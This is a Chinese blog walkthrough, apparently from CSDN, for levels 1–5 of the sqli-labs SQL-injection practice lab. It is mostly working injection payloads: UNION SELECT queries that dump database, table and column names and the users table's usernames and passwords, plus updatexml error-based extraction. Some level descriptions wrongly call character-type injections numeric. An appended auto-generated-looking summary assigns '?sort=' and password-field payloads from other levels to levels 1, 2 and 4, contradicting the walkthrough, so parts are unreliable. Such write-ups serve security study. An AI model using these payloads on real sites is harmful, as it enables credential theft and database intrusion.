Sqli-labs1~5关 通关解析

>>判断注入类型

判断方法

——字符型

            输入?id=1' and '1'=1,页面正常下一步

            继续输入?id=1' and '1'='2,页面错误,说明是字符型注入

——数字型

            输入?id=1 and 1=1,页面正常下一步

            继续输入?id=1 and 1=2,页面错误,说明是数字型注入

>>判断列数:? id=1 order by n

>>判断数据显示位置:?id=0 union select 1,2,3

>>查询所有的表名:

?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),(select group_concat(table_name) from information_schema.tables where table_schema='security')

>>查看user表中的列名

?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')

>>查看user表中的username这一列的值
?id=-1' union select 1,2,group_concat(username) from security.users--+

>>查看user表中的密码这一列的值

?id=-1' union select 1,2,group_concat(password) from security.users--+

sql注入基本语句:

order by 4 --+
--判断有多少列
union select 1,2,3 --+
--判断数据显示点
union select 1,user(),database()­­ --+
--­显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 --+
--查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 --+
--查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 --+
--查看账号密码信息

Less-1

题目要求输入ID作为参数和数值

输入?id=1 回显正常

输入?id=1' 回显报错 

输入?id=1'--+ 回显正常

判断是字符型注入,闭合方式是'

判断列数

使用order by,从1开始逐渐递增,报错时停止。

?id=1' order by 1--+

由此我们可以确认列数为3(4报错)

>>?id=1' order by 1--+

>>?id=1' order by 2--+

>>?id=1' order by 3--+

>>?id=1' order by 4--+

所以列数为3

>>判断数据显示位置

?id=0' union select 1,2,3--+

然后便可以插入SQL的一些语句去查询更多信息

查找当前使用的数据库的名称

?id=-1' union select 1,2,database()--+


查询所有的库名
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

查询所有的表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

查找security数据库的信息
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

查看user表中的列名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='user'--+

查看user表中的username这一列的值
?id=-1' union select 1,2,group_concat(username) from security.users--+

查看user表中的密码这一列的值

?id=-1' union select 1,2,group_concat(password) from security.users--+

Less-2

源码部分:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

进入页面,加上 ?id=1\ 判断闭合字符

发现是数字型的不需要闭合字符,我们直接进行order by 来判断出字段数为3

(剩下步骤同一)

Less-3

源码部分:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 


如图判断出闭合字符为’)

说明是数字型注入

方法同上

Less-4

说明是数字型注入

方法同上

Less-5

1.首先传参,没问题

2.判断类型

输入?id=1' and 1=1 -- a,页面正常,

输入?id=1' and 1=2 -- a,页面异常,为单引号闭合

3.按第一题做到联合查询(判断出来有3个字段),发现页面没变说明没有显示位,这时要用盲注,如果会输出数据库报错,也可以用updatexml报错注入

>>

updatexml报错注入

语法:updatexml(目标xml内容,xml文档路径,更新的内容)

输入?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- a

实际上是去更新xml文档,但是在xml文档路径位置里写入了子查询,输入了特殊字符,不符合输入规则就报错了,但是报错的时候已经执行了子查询代码,0x7e为16进制的~  ~中的就是库名

<<

4.查询表名

再输入?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) -- a

5.查询列名

再输入?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- a,看到emalis表里有有个id字段

6.输入?id=1' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1) -- a,看到有1的数据

sqli-labs是一个SQL注入学习平台,通过完成一系列的卡来学习和实践SQL注入漏洞的利用方法。根据引用的描述,首先需要在浏览器中打开"http://127.0.0.1/sqli-labs/",访问平台的首页。然后点击"Setup/reset Database"按钮以创建数据库,创建表并填充数据。 完成了上述设置后,可以开始挑战卡。 sqli-labs通关1:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关2:根据引用提供的内容,可以在账户密码后面加入"1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#"来进行注入。这样就能够获取到users表中的用户名和密码的组合。 sqli-labs通关3通关3的方法没有在提供的引用中找到相信息。 sqli-labs通关4:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关5通关5的方法没有在提供的引用中找到相信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [详细sqli-labs(1-65)通关讲解](https://blog.csdn.net/dreamthe/article/details/123795302)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Sqli-labs通关全解---Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值